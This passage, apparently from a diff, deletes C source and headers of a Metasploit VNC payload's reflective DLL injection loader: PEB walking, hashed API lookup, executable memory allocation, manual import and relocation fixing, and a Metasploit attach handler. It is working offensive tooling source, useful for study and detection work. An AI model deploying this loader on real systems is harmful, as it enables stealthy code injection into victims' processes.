uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//

View File

@ -1,37 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
#define _VNCDLL_LOADER_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
//===============================================================================================//
#endif
//===============================================================================================//

View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

View File

@ -1,451 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

View File

@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
